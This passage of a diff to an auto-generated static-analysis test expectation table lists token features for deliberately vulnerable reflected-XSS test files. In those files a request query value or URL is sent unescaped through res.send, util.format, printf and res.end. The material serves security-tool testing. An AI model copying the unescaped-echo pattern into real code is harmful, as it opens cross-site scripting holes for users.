    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | exceptional return of res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | exceptional return of res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | res.sen ... evil)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:9:6:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:9:6:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:9:6:12 | send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:9:6:12 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:9:6:12 | send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:17 | util | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:17 | util | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:17 | util | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:17 | util | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:17 | util | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:24 | util.format | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:24 | util.format | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:24 | util.format | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:24 | util.format | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:24 | util.format | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | exceptional return of util.fo ... , evil) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | exceptional return of util.fo ... , evil) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | exceptional return of util.fo ... , evil) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | exceptional return of util.fo ... , evil) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | exceptional return of util.fo ... , evil) | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | contextFunctionInterfaces | | @@ -21415,6 +142925,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:6:14:6:47 | util.fo ... , evil) | receiverName | res | +| autogenerated/Xss/ReflectedXss/formatting.js:6:19:6:24 | format | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:19:6:24 | format | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:19:6:24 | format | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:19:6:24 | format | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:19:6:24 | format | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:6:26:6:40 | "
    %s
    " | CalleeFlexibleAccessPath | util.format | | autogenerated/Xss/ReflectedXss/formatting.js:6:26:6:40 | "
    %s
    " | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:6:26:6:40 | "
    %s
    " | contextFunctionInterfaces | | @@ -21431,6 +142946,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/formatting.js:6:43:6:46 | evil | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/formatting.js:6:43:6:46 | evil | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:6:43:6:46 | evil | receiverName | util | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:7 | res | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:7 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:7 | res | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:12 | res.send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:12 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:12 | res.send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | exceptional return of res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | exceptional return of res.sen ... evil)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | exceptional return of res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | exceptional return of res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | exceptional return of res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | res.sen ... evil)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:5:7:54 | res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:9:7:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:9:7:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:9:7:12 | send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:9:7:12 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:9:7:12 | send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:20 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:20 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:20 | require | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:20 | require | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:20 | require | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | exceptional return of require("printf") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | exceptional return of require("printf") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | exceptional return of require("printf") | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | exceptional return of require("printf") | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | exceptional return of require("printf") | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | require("printf") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | require("printf") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | require("printf") | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | require("printf") | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:30 | require("printf") | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | exceptional return of require ... , evil) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | exceptional return of require ... , evil) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | exceptional return of require ... , evil) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | exceptional return of require ... , evil) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | exceptional return of require ... , evil) | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | require ... , evil) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | require ... , evil) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:7:14:7:53 | require ... , evil) | contextFunctionInterfaces | | @@ -21463,12 +143023,154 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/formatting.js:7:49:7:52 | evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | | autogenerated/Xss/ReflectedXss/formatting.js:7:49:7:52 | evil | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/formatting.js:7:49:7:52 | evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:0 | this | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:1:1:1 | require | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:14 | liveServer | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:14 | liveServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:14 | liveServer | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveSer ... erver") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveSer ... erver") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveSer ... erver") | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveServer | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveServer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:5:1:39 | liveServer | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:24 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:24 | require | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | exceptional return of require ... erver") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | exceptional return of require ... erver") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | exceptional return of require ... erver") | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | require ... erver") | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | require ... erver") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:1:18:1:39 | require ... erver") | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | calleeImports | | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/live-server.js:1:26:1:38 | "live-server" | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:3:16 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:3:16 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:3:16 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middlew ... T OK\\n}] | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middlew ... T OK\\n}] | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middlew ... T OK\\n}] | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:7:7:2 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:20:7:2 | [functi ... T OK\\n}] | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:20:7:2 | [functi ... T OK\\n}] | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:20:7:2 | [functi ... T OK\\n}] | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:3:20 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:3:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:3:20 | this | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:3:20 | this | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:3:20 | this | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | 'arguments' object of anonymous function | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | exceptional return of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | exceptional return of anonymous function | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | functio ... OT OK\\n} | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | return of anonymous function | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:21:7:1 | return of anonymous function | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:30:3:32 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:35:3:37 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:3:40:3:43 | next | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:40:3:43 | next | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:3:40:3:43 | next | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:3:40:3:43 | next | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:3:40:3:43 | next | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:17 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:17 | tainted | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:17 | tainted | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:17 | tainted | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:17 | tainted | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted = req.url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted = req.url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted = req.url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted = req.url | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:11:4:27 | tainted = req.url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:23 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:23 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:23 | req | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:23 | req | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:23 | req | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:27 | req.url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:27 | req.url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:27 | req.url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:27 | req.url | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:21:4:27 | req.url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:4:25:4:27 | url | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:25:4:27 | url | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:4:25:4:27 | url | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:4:25:4:27 | url | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:4:25:4:27 | url | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:7 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:7 | res | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:7 | res | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:7 | res | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:11 | res.end | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:11 | res.end | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:11 | res.end | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:11 | res.end | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:11 | res.end | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | exceptional return of res.end ... html>`) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | exceptional return of res.end ... html>`) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | exceptional return of res.end ... html>`) | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | exceptional return of res.end ... html>`) | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | exceptional return of res.end ... html>`) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | res.end ... html>`) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | res.end ... html>`) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | res.end ... html>`) | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | res.end ... html>`) | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:5:6:51 | res.end ... html>`) | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:6:9:6:11 | end | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:9:6:11 | end | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/Xss/ReflectedXss/live-server.js:6:9:6:11 | end | enclosingFunctionBody | req res next tainted req url res end tainted | +| autogenerated/Xss/ReflectedXss/live-server.js:6:9:6:11 | end | enclosingFunctionName | | +| autogenerated/Xss/ReflectedXss/live-server.js:6:9:6:11 | end | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:6:13:6:50 | ` ... /html>` | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/live-server.js:6:13:6:50 | ` ... /html>` | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/live-server.js:6:13:6:50 | ` ... /html>` | contextFunctionInterfaces | | @@ -21495,12 +143197,127 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/live-server.js:6:36:6:49 | | enclosingFunctionName | | | autogenerated/Xss/ReflectedXss/live-server.js:6:36:6:49 | | fileImports | live-server | | autogenerated/Xss/ReflectedXss/live-server.js:6:36:6:49 | | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:10 | middleware | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:10 | middleware | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:10 | middleware | fileImports | live-server | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:15 | middleware.push | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/live-server.js:9:1:9:15 